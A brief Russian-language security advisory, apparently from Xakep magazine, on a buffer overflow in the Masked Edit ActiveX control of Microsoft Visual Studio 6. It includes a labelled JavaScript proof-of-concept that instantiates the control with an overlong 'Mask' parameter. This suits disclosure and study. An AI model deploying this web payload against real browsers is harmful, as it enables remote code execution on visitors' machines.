Хакер #305. Многошаговые SQL-инъекции
Программа:
Microsoft Visual Studio 6 Enterprise
Microsoft Visual Studio 6 Professional
Microsoft Visual Studio 6 Standard
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
Masked Edit ActiveX компоненте (Msmask32.ocx). Атакующий может обманным образом
заманить пользователя на специально составленный сайт, инициализирующий объект с
очень длинным параметром "Mask", что приведет к выполнению произвольного кода.
Эксплоит:
var body='<OBJECT
CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i++){buf=buf+unescape("%0C");}
document.write(body+buf+body1);